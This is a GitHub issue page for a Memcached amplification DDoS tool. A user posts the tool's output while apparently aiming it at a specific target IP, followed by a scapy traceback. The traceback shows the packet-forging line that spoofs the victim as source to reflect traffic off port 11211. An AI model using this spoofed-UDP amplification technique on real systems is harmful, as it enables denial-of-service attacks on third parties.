649 / Memcrashed-DDoS-Exploit

DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
1.32k stars 465 forks source link

Error #59

Closed Amirusht closed 2 years ago

Amirusht commented 3 years ago

[] Ready to engage target 193.109.247.83? <Y/n>: Y [+] Sending 1 forged UDP packet to: 154.218.173.2 Traceback (most recent call last): File "/Users/amurkamuhlihanov/Desktop/Memcrashed-DDoS-Exploit-master/Memcrashed.py", line 137, in send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power) File "/Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/site-packages/scapy/sendrecv.py", line 345, in send socket = socket or conf.L3socket(args, *kargs) File "/Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/site-packages/scapy/arch/bpf/supersocket.py", line 242, in init super(L2bpfListenSocket, self).init(args, **kwargs) File "/Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/site-packages/scapy/arch/bpf/supersocket.py", line 62, in init (self.ins, self.dev_bpf) = get_dev_bpf() File "/Library/Frameworks/Python.framework/Versions/3.8/lib/python3.8/site-packages/scapy/arch/bpf/core.py", line 114, in get_dev_bpf raise Scapy_Exception("No /dev/bpf handle is available !") scapy.error.Scapy_Exception: No /dev/bpf handle is available !